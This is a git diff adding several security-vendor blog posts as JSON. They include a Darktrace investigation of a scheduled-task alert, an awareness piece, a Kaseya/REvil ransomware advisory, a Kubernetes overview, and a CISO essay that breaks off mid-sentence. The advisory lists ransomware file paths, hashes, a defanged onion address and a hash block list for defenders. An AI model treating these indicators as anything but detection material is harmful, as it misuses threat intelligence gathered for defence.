Is this activity commonly seen between these hosts? If we can answer these questions, we should be able to confidently determine whether or not this alert is related to malicious activity. But first, we need to gather additional evidence using the Darktrace console. So where do we start? In my experience, it\u2019s always best to start with what you know. At this point, we only know that the model breach Device / AT Service Scheduled Task has been triggered. But how do we know exactly what that means? Let\u2019s view the model and explore the logic. Looking at the logic behind this model breach, we can see that any message containing the strings atsvc and IPC$ will match this model breach. Since the frequency has been set to > 0 in 60 mins we can also assume that once this activity is seen exactly one time, it\u2019ll trigger an alert. By understanding this logic, we now know: Step two: chasing the initial lead Now that we know what we\u2019re looking for, let\u2019s go grab some data. First, let\u2019s explore the Bro log messages that triggered this model. To do this, open up the Model Breach Event Log. This shows us the related events that were observed for this model breach. As you can see below, there was a successful DCE-RPC bind, followed by SMB Write/Read success containing the keywords atsvc and ICP$ . This is helpful. However, we\u2019re interested in the surrounding context of these events. The quickest way to see this is to use the View advanced search for this event feature of the Model Breach Event Log as shown below. Look familiar? Welcome back to the advanced search console. Now, let\u2019s dig into the activity a bit more. As we discussed before, we know this model represents a common lateral movement technique using remotely scheduled tasks. By checking out the advanced search results for this model breach, we can get a better look into the context surrounding this activity. First, when we browse through the messages before and after the model breach alert, two distinct messages stand out. First, we see a successful NTLM authentication message for the account appadmin . Since NTLM is commonly used with SMB for authentication, we can infer this is likely the account being used by the source machine to establish the SMB session. Immediately after this authentication we can see the following DCE-RPC message for a named pipe being created involving atsvc: As highlighted in the above screenshot, we can also see that the RPC bind was created referencing the SASec interface . Using online resources to validate, we learned that the SASec interface \u201conly includes methods for manipulating account information, because most SASec-created task configuration is stored in the file system using the .JOB file format\u201d ( https://msdn.microsoft.com/en-us/library/cc248269.aspx ). What does that tell us? Well, we can infer that one possible explanation for this connection was that it was made to query information about a scheduled task defined within the .JOB format, rather than a new scheduled task being created on the host. However, within this model breach Darktrace doesn\u2019t show any messages mentioning a file with the extension \u201c.JOB\u201d. This is where we can put the Darktrace advanced search back to work to find us some answers. By querying \u201c*.JOB AND SMB\u201d within the timeframe of the activity we\u2019ve already observed, some promising results start to appear. As shown above, we observe three unique .JOB files being accessed over SMB during the exact time of our previous observations. Considering the hosts and the timeframe, we can correlate this activity to the original model breach. With this observation, let\u2019s consider what we know so far: Step three: scoping additional evidence So you might be asking yourself at this point, \u201cHow can we definitely prove this is non-malicious activity with only network data?\u201d Well, it\u2019s time to yet-again harness the power of Darktrace\u2019s advanced search for some scoping fun. Let\u2019s take a second to consider what this activity would look like if it was malicious. AT jobs over SMB are used to execute something on a remote host. This means scheduling a task to run a malicious binary and establish persistence one time . However, we know that frequently in an enterprise environment, SMB is used for reading/writing files for the purpose of benign client-server communication. The frequency of such activity would be harder to identify without a quick way to query terabytes of log data, but with Darktrace we can scope months worth of records to analyze the frequency of such connections to identify anomalies within seconds. Let\u2019s take one of our pieces of evidence AV.job and create a simple query to understand how frequently this activity occurs. Using the query \u201cAV.job AND smb\u201d over the past 60 days, the advanced search returns daily entries for identical activity going all the way back to April sixth. Notice, the activity occurs around the same time each day, involving the same hosts and file paths (data truncated for screenshot purposes). Step four: Validation via packet analysis As an analyst, this is starting to smell like legitimate administrative activity to me. But the remaining sliver of doubt that I have lies within the ability to analyze the contents of the requested file AV.job . One of the other great features of Darktrace is it\u2019s full packet capture capability. With this, we are able to grab a custom PCAP based on the data observed in a model breach, or at random by specifying a source IP address and timeframe of interest. Using this capability, I created a packet capture for a five-minute window around the timeframe of the source IP address observed in the model breach. Once I collected the PCAP, I downloaded and analyzed it in Wireshark. Fortunately, Wireshark was able to extract transferred files within this SMB session using the Export Objects feature. Using a hex editor, we can see the contents of AV.job . As you can see, the contents of this file refer to an executable in the location C:Program FilesSophosSophos Anti-VirusBackgroundScanClient.exe. Judging by the name of the .JOB file this was found in, we can infer it\u2019s likely a legitimate scheduled task created to perform an antivirus scan on the endpoint each morning. This doesn\u2019t rule out the possibility this binary has been replaced with a malicious executable with the same name/path. But as far as network evidence goes, Darktrace has helped us generate solid leads that can take us to the endpoint for further validation. Reviewing our original analysis questions, we are now able to confidently answer all 4 questions. Conclusion We often find that network detection is really effective at generating leads by uncovering suspicious activity. Being able to effectively use an investigative platform like Darktrace allows an analyst to quickly confirm and scope potential threat activity and identify network based indicators (NBIs) related to an attack. It can also help generate additional host based indicators (HBIs) to supplement your investigation. In short, effectively using the Darktrace advanced search and other features to discover model attacker activity highlighted in the MITRE ATT&CK framework, is a sure-fire way to enhance your organization\u2019s response and hunting capabilities." +} \ No newline at end of file diff --git a/it-s-time-to-drive-a-rising-tide.json b/it-s-time-to-drive-a-rising-tide.json new file mode 100644 index 0000000000000000000000000000000000000000..bdbec22247064fd5474aa9ff9ad16234cffd865f --- /dev/null +++ b/it-s-time-to-drive-a-rising-tide.json @@ -0,0 +1,6 @@ +{ + "title": "It's time to drive a rising tide", + "url": "https://expel.com/blog/time-to-drive-rising-tide/", + "date": "Oct 22, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG It\u2019s time to drive a rising tide Tips \u00b7 10 MIN READ \u00b7 YANEK KORFF \u00b7 OCT 22, 2019 \u00b7 TAGS: CISO / Managed detection and response / Managed security / Management Back in 1972, in an effort to help its people deal with rising food prices and promote healthy choices, the National Board of Health and Welfare ( Socialstyrelsen ) in Sweden came up with a model of \u201cbasic\u201d and \u201csupplementary\u201d foods. This model was refined into a triangle shape to help people visualize proportions a little better by Anna Britt Agns\u00e4ter , whose goal was to improve people\u2019s dietary habits. This design spread gradually across the world hitting Australia in the 1980s and finally, the United States adopted a version of the pyramid in 1992. We know now that the design was pretty terrible , and there have been several revisions since . Nevertheless, it was widely understood and widely adopted. As with most things, the primary driver for this adoption was that it was a simple message, frequently repeated. And while the model has (ahem) shortcomings , it did have some positive impacts including raising awareness about dietary health and getting people to think about portion sizes. You may be wondering how food and cybersecurity are related. (It\u2019s not just because I haven\u2019t yet eaten breakfast.) We\u2019re facing the same sort of challenge in cybersecurity today as they were in Sweden back in the 1970s. Whether you\u2019re a business or an individual, cybersecurity is some combination of complicated and expensive \u2014 both of which will demotivate you to do anything about it. Meanwhile, we\u2019ve got massive FUD-based marketing campaigns that say little more than, \u201cThe bad guys are out to get you so you\u2019d better spend lots of money!\u201d The cybersecurity patchwork we live under Why are we in this state? Because there\u2019s widespread disagreement around the cybersecurity fundamentals that help keep us safe. This inconsistent application of basic cybersecurity practices creates a wonderful environment for organized adversaries to accomplish their missions \u2014 whether that\u2019s stealing financial info or mucking with critical infrastructure. I was on Capitol Hill a few months ago and lost track of the number of times I heard the phrase \u201crising tide\u201d in relation to cybersecurity. We don\u2019t yet have it. But we need it. Security one percenters (those with proportionally unlimited budgets) can find and retain talent and implement just about anything. Large enterprises can often afford a solid combination of security products and services to build a relatively effective security response strategy. Everyone else? They struggle to build an effective security posture \u2026 whether it\u2019s because of technology, hiring the right people or building the right bridge between the two. The consequences of being in the \u201ceveryone else\u201d boat are clear. Just look at the litany of breach reports hit the headlines only to be swallowed by bigger ones a few months or weeks later. And those are only the ones that get reported. Once in a while you\u2019ll see a big company name \u2026 but more often the problem strikes further down in the mid-market. In fact, as most attackers have discovered at this point that it\u2019s easier to get to large companies by attacking their less prepared suppliers . Larger enterprises push on their supply chains these days with long lists of high-level security questions as if their compliance will increase the chances of their security. (Spoiler alert: It doesn\u2019t.) There\u2019s no shortage of recommendations. CIS security controls? Check. CISA guidance? Sure. Best practices for cloud security? You bet. The NIST CSF will help you work through decisions to improve your security posture. Yet the challenge most organizations face isn\u2019t with knowing what to do, it\u2019s the challenge of getting all those to-dos done. The biggest challenge with cybersecurity? It\u2019s not a lack of tech. Or a lack of \u201cbest practices.\u201d It\u2019s the business . We\u2019re approaching this wrong We\u2019ve got cybersecurity frameworks and tech stacks coming out our ears. So why can\u2019t we \u201cdo\u201d cybersecurity better? It\u2019s because the business can\u2019t handle the disruption of turning off macros in excel documents that are downloaded from the Internet. The business isn\u2019t willing to deal with the hassle that two-factor authentication introduces into people\u2019s daily lives. A password manager? No way \u2014 the business is perfectly happy with sticky notes. Besides, after years of unreasonable password requirements , the business isn\u2019t interested in jumping over your newest hurdles. I\u2019ve got a secret to share about the business . Like Soylent Green, the business is people! Some faceless business didn\u2019t decide it needed to gradually increase its use of Apple mobile devices and laptops in the traditionally Wintel office environment. People did. You and I started using these devices at home and brought them into the workplace, gradually (but significantly) bolstering Apple\u2019s success in the enterprise space. Cybersecurity needs to vector into the enterprise in the same way. This is where the food pyramid comes in \u2026 or something like it. When you\u2019re trying to drive a change like this \u2014 getting the business to care about security \u2014 success demands two things: people need to understand how making a change will help them and those changes need to be easy to remember. We need to encourage (just) four things I\u2019m asking people to do four things, in order. The set of recommendations below come in two parts: one way to effectively communicate the recommendation to a broad audience, and the justification for why each is a recommendation in the first place. Remember that the more recommendations we add, the less likely they\u2019ll be remembered \u2014 and one \u201cmust do\u201d of any cybersecurity framework is to make sure that the guardrails you\u2019re coming up with are things that the business will actually do. #1: Update If you\u2019re not up to date, you\u2019re out of date \u2014 or so the saying goes. Or if it\u2019s not a saying, it should be. Did you know that you can keep your data safe by doing nothing more than keeping your stuff up to date? Turns out that large companies in the headlines can often point to not-updating as the reason why they were breached. Save a lot of heartache and stay up to date. Why update? When I say \u201cupdate,\u201d you might think, \u201cHe surely means \u2018patch.\u2019\u201d But I\u2019m not calling it patching. Patching has an innately negative connotation. It\u2019s not a \u201cfix,\u201d it\u2019s just a temporary \u201cpatch.\u201d While that may be true since we\u2019re talking about software, if the objective is to motivate action, \u201cupdate\u201d encourages the same behavior without the associated baggage. Long-time information security practitioners will be unsurprised to hear that from 2016 to 2017, 60 percent of orgs that suffered a data breach can point to a known vulnerability as the reason for the breach. These vulnerabilities may allow direct access into an enterprise system to an external attacker, or could be paired with a phishing scheme that uses a malicious attachment to exploit a vulnerability local to the user\u2019s machine. Adobe has the privilege of holding the top four slots (as I write this) on the Top 50 Products By Total Number Of \u201cDistinct\u201d Vulnerabilities in 2019 . Several Microsoft ones shortly after that. You running any Adobe or Microsoft software in your enterprise? Yeah, I thought so. Over the past several years, there have been arguments crop up from time to time advocating caution against patching \u2026 or at least automatic patching. Remember, we\u2019re not talking about defining the best enterprise patching strategy here. We\u2019re trying to build a culture amongst non-security people that they err on the side of turning on automatic updates wherever they go. As computer users, we should want software to be automatically updated. Because once in a blue moon, if something goes wrong, the user pushback becomes overwhelming to deal with. What if we were all on the same side? Let\u2019s all be irate if patches break and demand better from vendors. #2: Backup It\u2019s heartbreaking to lose precious data. Pictures you\u2019ve taken over the past several years, old emails you\u2019ve been keeping around for nostalgia\u2019s sake, those few letters you\u2019ve written \u2026 these are just as important to you as your yearbooks, old postcards, and other keepsakes in your home. Safeguard your data by using a backup service for your computer. Should your computer go up in smoke, you\u2019ll always be able to get your files back. Why backups? Ransomware\u2019s run rampant through businesses in the past several years, particularly because it\u2019s been so successful and it\u2019s substantially cheaper to pay the ransom than it is to hire consultants to fix the problem afterward. This then funds both a higher volume of adversaries and more sophisticated attack methods. It\u2019s the gift that keeps on giving \u2026 to the bad guys. Turns out one of the simple and effective ways to protect against it is to have a backup of your data. Should you test your backups? Of course. But the first step is actually backing up the data. Some argue that an untested backup is no backup \u2014 but it misses a crucial point. It\u2019s entirely possible that an untested backup is just fine. You just don\u2019t know. Introducing another hurdle before getting people to buy into doing a backup in the first place isn\u2019t a good idea. #3: Learn the two step There\u2019s a 1-in-170 chance that one of your social media accounts will be taken over by someone else today if you\u2019re using only a password. The odds aren\u2019t in your favor. Most people spend days apologizing to friends for things they didn\u2019t even do (including tricking them into transferring money). Skip the hassle and turn on two-factor or two-step authentication. Why not multi-factor authentication? No, two-factor authentication and two-step authentication are not the same thing . Yes, I\u2019m equally aware that SMS-based methods are substantially less secure than their app-centric counterparts. The point is to start small. Let them discover the flaws after accepting the notion of \u201ctwo things\u201d and go from there. But even adopting two-step authentication over SMS is a stronger stance than using only a password. It\u2019s important to drive home the message of safety here. Unintended accidents happen. Send a \u201cherd immunity\u201d message. Despite evidence to the contrary , it works. #4: Forget your passwords Save time logging in anywhere by skipping the username and password prompt. Install a password manager. It\u2019ll generate passwords for you, log you in with one click, and keep your account much safer. When your favorite website tells you they lost your password to hackers, you can change just one password instead of a dozen because password managers help you use a unique password on every website (that you don\u2019t even have to memorize). Why password managers? I won\u2019t list all the problems with passwords, but there are many. Multi-factor authentication goes a long way to improving the situation here, as do alternative methods for authentication like biometrics. Recovering from a compromised account is bad enough, but dealing with constantly changing passwords for sites whose accounts have been compromised en masse is a pain. Considering that most people reuse passwords, this threat surface is huge. Beyond the security reasons for using a password manager, though, is the fact that it actually makes it easier to deal with all your accounts. Most password managers act like bookmarks and will log you into sites automatically with one click. That said, it can be a huge mental shift for people. So what will it take to be convincing? Keep reading. Stick to some messaging themes Maybe you buy the arguments above, maybe you don\u2019t. Regardless, I\u2019d like to offer some thinking around why these recommendations are expressed in this way. The TL;DR: It\u2019s all about making your employees feel that these (few) recommendations are easy for them to remember and follow. Because then they\u2019ll be more likely to put them into practice. Make it personal When you\u2019re selling these ideas, it\u2019s critical to make it clear that we\u2019re talking about your apps (software), your stuff (data) and yourself (your identity, time, and money). Making this personal creates a stronger connection with the recommendations. You know how Apple creates a connection when you walk into a store? They intentionally angle the screens of their laptops so the first thing you do is adjust it \u2014 you touch the machine. When it\u2019s about you, you\u2019re more likely to take action. Safety over security The pedantic will argue that \u201csecurity\u201d is the right word to use here. But I\u2019ve had enough conversations with people who say, \u201cthat would never happen to me,\u201d that tells me safety is the better word. In case you\u2019re not caught up on the difference, general consensus appears to be that \u201csafety\u201d is about protecting against unintended threats, while \u201csecurity\u201d is about protecting against intentional ones. While most people don\u2019t believe in intentional threats, they\u2019re willing to make accommodations for unintentional ones to avoid becoming collateral damage. No buzzwords Instead of telling people to \u201cuse multi-factor authentication\u201d or \u201cinstall a password manager,\u201d introduce a catchy phrase that says what to do and how you\u2019ll benefit \u2014 in everyday language. Some symmetry Notice the two recommendations pair. The first two, updates and backups, speak to keeping your data safe. In the former case, you\u2019re protecting your data by making it hard for people to break into your apps. In the latter case you\u2019re protecting your data by making a copy of it. The second two recommendations are about keeping people away from your stuff with effective (and in the latter case, time-saving) authentication. No red I\u2019ll grant you that working at Expel gives me a particular predisposition to green. Still, we have enough red, grey and black in the security space and what people need is a path towards a safer tomorrow versus campaigns full of FUD with photos of attackers wearing hoodies. This reminds me of parenting toddlers : don\u2019t tell them what not to do, tell them wha t to do instead. What\u2019s next? Remember our premise: the business is people and you need to drive change in people\u2019s behavior. Frankly, most people don\u2019t care much about the overall security of the company in which they work. You might \u2014 if you\u2019re on the security team. Everyone else, though, has a job to do and they care much more about that than the security implications of sending an email or hosting a Zoom meeting. Or worse: They think security might get in the way of getting their stuff done. If you really want to drive better security awareness, forget the business. Promote individual security. Promote basic behaviors that people can start doing at home and then they can bring those same practices into the office. Convince people to care about their own email and social media accounts. Help people understand the costs and hassles associated with identity theft or simple loss of data, and provide the tools for them to secure their personal lives. At scale, they\u2019ll bring this mindset back into the office and together will drive a rising tide. Having a message is the first step, and we\u2019ve talked a lot about what that might look like. Simplifying it is step two \u2014 and I\u2019m not convinced we\u2019re there yet \u2014 but perhaps you can take the messages above and move in that direction. Once you\u2019re there, the third step is repeating it frequently enough and in sufficiently unique ways that the message resonates. The marketing rule of 7 , if you will. It\u2019s cybersecurity awareness month this month and it\u2019s a great time to roll out this sort of campaign in your org. Will you join us and help drive a rising tide?" +} \ No newline at end of file diff --git a/kaseya-supply-chain-attack-what-you-need-to-know.json b/kaseya-supply-chain-attack-what-you-need-to-know.json new file mode 100644 index 0000000000000000000000000000000000000000..58d3ffcb4e04ad8973f56334a886235df2e95d45 --- /dev/null +++ b/kaseya-supply-chain-attack-what-you-need-to-know.json @@ -0,0 +1,6 @@ +{ + "title": "Kaseya supply chain attack: What you need to know", + "url": "https://expel.com/blog/kaseya-supply-chain-attack-what-you-need-to-know/", + "date": "Jul 6, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Kaseya supply chain attack: What you need to know Security operations \u00b7 3 MIN READ \u00b7 BEN BRIGIDA, MATTHEW BERNINGER, JON HENCINSKI, EVAN REICHARD AND RAY PUGH \u00b7 JUL 6, 2021 \u00b7 TAGS: Alert / MDR It was a few hours before the start of a holiday weekend, and attackers decided to strike. What type of attack? You guessed it \u2013 ransomware. There\u2019s been a steep rise in supply chain ransomware attacks like this one since 2017, and we have no doubt that we\u2019ll continue to see these types of attacks. Unlike the smaller payout bad actors may earn using cheap tactics, a sophisticated attack like this latest REvil ransomware attack can mean big money. So constantly evolving their tactics is an investment attackers are willing to make. But here\u2019s your reminder to not panic. The community rallied quickly, creating awareness and providing guidance on how to guard against this attack. And we\u2019ll continue to do so in the face of events like this. What happened Kaseya, an IT solutions company used by many Managed Security Providers (MSPs) and enterprise orgs, announced on July 2, 2021 that it was the victim of a large-scale supply chain attack. Kaseya VSA, a remote monitoring and management (RMM) tool, was exploited via a zero-day vulnerability (CVE-2021\u201330116) to deploy ransomware to MSPs and at least hundreds of US businesses. The ransomware was deployed through an automated malicious Kaseya VSA software update. The ransomware threat group REvil, also known as Sodinokibi, claimed responsibility . The Kaseya SaaS VSA servers were shut down and the company recommended that all local VSA servers be shut down immediately. Kaseya\u2019s team worked quickly and believes the attack is localized to a few on-prem customers. On July 4, 2021, Kaseya announced that all VSA SaaS servers will remain in maintenance mode. Below is a recap of what we know so far. Technical details REvil ransomware encryptor is dropped at c:kworkingagent.exe Further files are dropped in c:windows: MsMpEng.exe (legitimate Microsoft Defender copy) mpsvc.dll (Malicious REvil DLL) The malicious mpsvc.dll is side-loaded into the legitimate Microsoft Defender copy (MsMpEng.exe) Indicators and warnings c:kworkingagent.exe c:kworkingagent.crt 45aebd60e3c4ed8d3285907f5bf6c71b3b60a9bcb7c34e246c20410cf678fc0c (agent.crt) d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e (agent.exe) 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd (mpsvc.dll) e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 (mpsvc.dll) hxxp://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion What you can do right now to keep your org safe First and foremost \u2013 don\u2019t click on any links! Kaseya warned that links sent by the attackers \u201cmay be weaponized.\u201d They\u2019ve also shared a new Compromise Detection Tool to help determine if there are indicators of compromise on a VSA served or managed endpoint. There are also a few steps you can take right now to protect against this attack. If you haven\u2019t already done so, we recommend you immediately: Shutdown VSA server Disable / Uninstall Agent Block all known malicious hashes: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e (agent.exe) 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd (mpsvc.dll) e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 (mpsvc.dll) Lastly, make sure you incorporate these learnings into your detection strategy. After notifying our customers of the situation, Expel deployed \u201cbe on the lookout\u201d detections \u2013 where customers are immediately notified of a detection \u2013 for the two known malicious hashes, and for the known file paths the attackers have been reportedly using. Expel has also begun pushing out more generalized logic rules to catch variants of these attack vectors. What you should keep in mind We get it. Saying \u201cdon\u2019t panic\u201d is easier said than done. Constant news of emerging threats can be nerve-wracking and downright frustrating. But it\u2019s important to remember that in the minutes and hours after an announcement like this, certain things are key: communication, action and integration. Communicating with our customers and notifying them of new threats is critical. Not only do they need to know that you\u2019re on it, but this also gives them the chance to take their own actions. So, whether it\u2019s with customers or your internal teams, make sure everyone is in the loop. Time is of the essence. Depending on the situation, taking action could mean deploying new signatures, implementing a new hunting strategy, responding to active attackers or \u2013 if you\u2019ve evaluated the information and there\u2019s really nothing to do \u2013 sometimes nothing. And during an attack outbreak like this, burnout can happen quickly. The mental strain of being in constant emergency mode will only exacerbate burnout and lead to alert and response fatigue. Remember that resiliency also includes keeping your team safe from burnout . While, fortunately, Expel\u2019s customers were not impacted, this serves as a great reminder that during any incident, it\u2019s important to understand what completion looks like. As we respond to urgent incidents like this, we\u2019re also working to integrate whatever actions we took or are taking back into our usual operational cadence here at Expel. Finally, be sure to stay informed on the developments of this newest ransomware attack by regularly checking Kaseya\u2019s updates ." +} \ No newline at end of file diff --git a/kubernetes-security-what-to-look-for.json b/kubernetes-security-what-to-look-for.json new file mode 100644 index 0000000000000000000000000000000000000000..078456d1c07e3df02a6da72cc8b447aceca75fcd --- /dev/null +++ b/kubernetes-security-what-to-look-for.json @@ -0,0 +1,6 @@ +{ + "title": "Kubernetes security: what to look for", + "url": "https://expel.com/blog/kubernetes-security-what-to-look-for/", + "date": "Mar 1, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Kubernetes security: what to look for Security operations \u00b7 3 MIN READ \u00b7 DAN WHALEN \u00b7 MAR 1, 2023 \u00b7 TAGS: MDR When it comes to Kubernetes (k8s), there are three kinds of organizations: Orgs that need security (preferably sooner vs. later) Orgs that built their own security Orgs that started building their own and decided there has to be a better way We imagine there are a lot of #2s that are very close to becoming #3s. Regardless, if your operation does its own application development, k8s is likely part of your future (or present). The problem is that, like any new tech, k8s has its share of security gaps, and failure to address them could lead to\u2026suboptimal outcomes. So, if you\u2019re one of these organizations, what should you look for when building or shopping for a Kubernetes security platform? Here are a few suggestions. Kubernetes security should be integrated. There are many, many platforms, technologies, and solutions (cloud, network, endpoint, and more) in the modern security operations center (SOC), and each one represents an opportunity for the cyber defenders of the world. The ideal answer to your challenges integrates k8s development and security with as many of these disparate systems as possible, affording you a clean, unified view of your environment and the entire attack surface. This is especially important for Kubernetes, where much of the context you\u2019ll need for detection and response exists in other tech. Kubernetes security should be customizable. Technical requirements change. Business requirements change. New platforms are onboarded. Leadership decides to embark on new initiatives. If all goes well, the organization grows . It often seems like the SOC isn\u2019t the same as it was five minutes ago. If you aren\u2019t set up for it, change (like expanding k8s operations) can represent chaos (and chaos equals risk). As your k8s operations expand, you\u2019ll need a security environment that scales\u2014quickly and seamlessly. When this happens, security accelerates the business instead of hindering it, turning the board\u2019s periodic cost conversations into ROI conversations. Kubernetes security should be automated, fast, and accurate. Threats come at you fast. Which is why there\u2019s no substitute for intelligent automation in any SOC, especially one serving an organization that\u2019s relying more heavily on emerging technologies. K8s is especially prone to exploitable configuration errors, with more than half of organizations using Kubernetes detecting a misconfiguration in the past year . Your SOC needs to be able to analyze k8s clusters and create detections (in alignment with the MITRE ATT&CK framework ), providing you with insights you can put into play 24/7. Kubernetes security should be accessible. Security has a bit of a bad rap for being complex and obscure (something we\u2019ve tried hard to rally against). Kubernetes is already a highly specialized area of expertise\u2014if you\u2019re looking for k8s security experts\u2026good luck. Security solutions should help bridge this gap. We love Kubernetes wizards (what would we do without you?) but the truth is we can\u2019t expect everyone to be one\u2014especially as we think about folks on the front lines in a SOC. The ideal solution allows your people (technical and not) to succeed without requiring expert-level K8s chops. Kubernetes security should be transparent and trusted. This shouldn\u2019t need saying, but let\u2019s say it anyway. As k8s grows, we\u2019ll see more and more \u201csolutions\u201d aimed at safeguarding it. Not all of them are going to be ready for prime time, so question 1 has to be: Do I trust this provider with my business? Question 1a: If so, why? In our view, transparency goes a long way towards building trust\u2014these days most security folks avoid \u201cblack box\u201d solutions. You\u2019ll be tempted to try open-source tooling (there are many great projects to choose from) but don\u2019t equate open source with \u201cfree.\u201d Choosing the right solution will depend on your specific requirements and what you want to take on versus hire out. This list doesn\u2019t cover everything you need to address , but once you\u2019ve satisfied these four criteria, you\u2019ll be well down the road toward securing a genuinely transformative new development technology for your business. If you have questions or just want to talk through things, drop us a line ." +} \ No newline at end of file diff --git a/lessons-learned-from-a-ciso-s-first-100-days.json b/lessons-learned-from-a-ciso-s-first-100-days.json new file mode 100644 index 0000000000000000000000000000000000000000..a6c4d262bdae2bfde1e7f4289c974de01dd433bf --- /dev/null +++ b/lessons-learned-from-a-ciso-s-first-100-days.json @@ -0,0 +1,6 @@ +{ + "title": "Lessons learned from a CISO's first 100 days", + "url": "https://expel.com/blog/lessons-learned-from-a-cisos-first-100-days/", + "date": "Jul 11, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Lessons learned from a CISO\u2019s first 100 days Security operations \u00b7 7 MIN READ \u00b7 AMANDA FENNELL \u00b7 JUL 11, 2018 \u00b7 TAGS: Career / CISO / How to In this guest post, Amanda Fennell, CSO at Relativity reflects on what she\u2019s learned. I recently finished my first 100 days as Chief Security Officer (CSO) of Relativity. I\u2019ve learned a lot. And while every new CSO faces unique challenges based on their organization\u2019s mission and circumstances, with the benefit of hindsight (and a little time to breathe), I\u2019ve come up with some recommendations to help new CSOs navigate their first few months. Understanding the unique context of an organization is the first component of building a world-class security program. Our company, Relativity , is an e-discovery firm and creator of the industry-leading e-discovery platform used by over 170,000 users in 40+ countries. Our clients represent the highest tiers of government, public and private industry entities, including the Department of Justice, Deloitte and NBC Universal. Relativity\u2019s cloud solution, RelativityOne , offers all the functionality of Relativity in a secure and comprehensive SaaS product. Our clients trust our tools to discover the truth within the massive amount of documents they review and manage during investigations, litigation and lawsuits. When handling billions of highly sensitive documents, security is of utmost importance to build and maintain confidence with our valued users. Understanding the significance of security to Relativity was pivotal when I stepped into the role. Now that I\u2019ve spent the past 100+ days working to gain a better understanding of how we do what we do, I also know how to make the security team a critical part of the organization. And that leads me to my biggest takeaway. The most important thing a new CSO (or any leader) can do in their first few months is to create a compelling vision and communicate it effectively. With that, I have distilled my experience on reaching that outcome. 1. If you can, take your time Relativity moves fast \u2013 that\u2019s our culture. But if I had the chance to start this process again, I\u2019d give myself more time. The design and implementation of a security roadmap must have defined milestones, but exist as a living document to align with the inherent impermanence of the field. If you can, dedicate a defined period \u2013 ideally 30 to 90 days \u2013 to assess the current state and understand the interdependencies of the various teams in your organization. Even if you\u2019ve got the techiest of CIOs (and we do), and you immediately click, you\u2019re going to be responsible for security throughout your organization, and it takes observation and experience to understand how each team derives value from security. Understand that they have their own objectives, and roadmaps, and they\u2019re having to add you in late to the game. These first few months I was in a state of assessment and now we are moving to a state of measuring movements, growth and execution on our objectives. We have a strong team and we worked hard to assess key risks and adopt the mindset of an adversary working to breach Relativity and our clients. We completed our gap analysis with this in mind and addressed any perceived weaknesses. But I also spent my first days as CSO considering the role of security in the overall business and learning from a series of nearly 50 one-on-ones with directors and VPs to find out what matters most to folks across the company and how I could work effectively with each key stakeholder. Something as simple as a survey can help establish a more complete sense of your new organization and provides a baseline reference for measuring the success of the program. Shortly after taking on this new challenge, we sent out a survey to get more information on what people thought worked, and what needed addressing. A few months later, we did a follow-up to measure success. That gave us a sense of how our internal customers viewed our security team, and it was very helpful in helping me identify initial priorities and course-corrections to seize early wins. Once you\u2019ve gained an understanding of your organization\u2019s challenges, you can begin creating a vision for security and refine it across your organization. 2. Aligning Security with the Business I may not have had my final roadmap by day three, but I had started my research. I realized early-on that I wasn\u2019t going to get anywhere without budget and resources \u2013 and the best way to get those was by connecting security to revenue. Since security is a key concern for our clients at Relativity, that meant connecting with our sales department. This gave us a direct route to treat security as a product that is constantly evolving, transparently reported and consumable by our end-users. To empower our clients to trust and understand how we secure their data, we needed our marketing and sales teams to offer insight and expertise on what we do, and why we do it. I started meeting regularly with our marketing team to make sure they understood what we\u2019re doing \u2013 and so I understood how they work. I talked with them about my vision of integrating security and sales, and I got crucial buy-in to establish this partnership. I\u2019m fortunate in my role. I\u2019ve got a CEO who is extremely technical, committed to security and willing to put the time and resources into implementing the best possible solution for our clients. I inherited a top-notch product security team. But a CEO is just one person, and a company is more than security, sales and marketing. The next objective was to sell my vision of security integration across the company. From the insight gained from those initial meetings with our stakeholders, I understood the motivations and drivers for directors and VPs across the organization. I also seized the opportunity to polish my strategy and developed ways to pivot into company-wide contributions. Relativity has spent considerable effort recruiting the best minds in our industry, and they were quick to challenge my assumptions and objectives to gain a sense of my approach. Confidence in my strategy, along with passion for our mission, helped me make a convincing case. The connection between security and the business may not be as direct in your organization as it is at Relativity. But I guarantee there\u2019s a connection to a department outside of your own. You\u2019re assuredly not in a vacuum and you exist to secure your company. You fundamentally provide a service and how do you know how you\u2019re doing? How do we get things accomplished? By being part of a team. Having stakeholder meetings, SLA\u2019s and KPI\u2019s. If it seems elusive, use your one-on-ones in the first 60 days to connect the dots and push yourself to find the direct connection and identify the business questions you\u2019ll need to answer effectively. 3. Create ambassadors Once I had my vision, my strategy was relatively simple: because security is a top consideration for any company considering Relativity, the team members on our front line need to be confident when speaking to complex security topics. I made a business goal to work with our sales team to help them truly understand how we keep data secure. We\u2019re starting to host real, in-depth technical training sessions \u2013 not just, \u201chey, read this deck and watch this video,\u201d but actual lessons on how the customer\u2019s data is protected, how encryption works and what monitoring with our cloud security team actually looks like. By integrating with our sales and marketing team, we enable and empower them to do their jobs even better than before. Nobody has to call the security team to ask, \u201cHey, which datacenters have we got located where?\u201d They can provide a comprehensive, accurate and appropriate answer in real-time. We now have a sales team that works as an extension of our security team. If your road to connecting security to revenue doesn\u2019t go through the sales or marketing organization itself, the same principle applies. Figure out who cares about security (and who ought to). Then, get personally involved in making sure they understand your vision and can educate the team or client that needs to know. Another great example is IT. Our IT department has provided a great deal of support to prioritize security initiatives and make our vision tangible. Why? Because they care about security. You\u2019ll find solid partners in IT and engineering teams \u2013 smart, savvy and a healthy dose of paranoia about securing things. That\u2019s a great start to a partnership! 4. Pick concrete collaborators you can trust Several core values here at Relativity create a spirit of transparency. We\u2019re feedback driven. We want our people involved in the process of developing our business, which means we want everyone on the same page. That\u2019s true across teams, as well as with our third-party partner relationships. We\u2019ve selected a great set of vendors we collaborate with including Palo Alto Networks, Recorded Future, RedLock and Splunk. We made these decisions after careful review and analysis about what would be the best fit for our company, product and teams. We also wanted someone 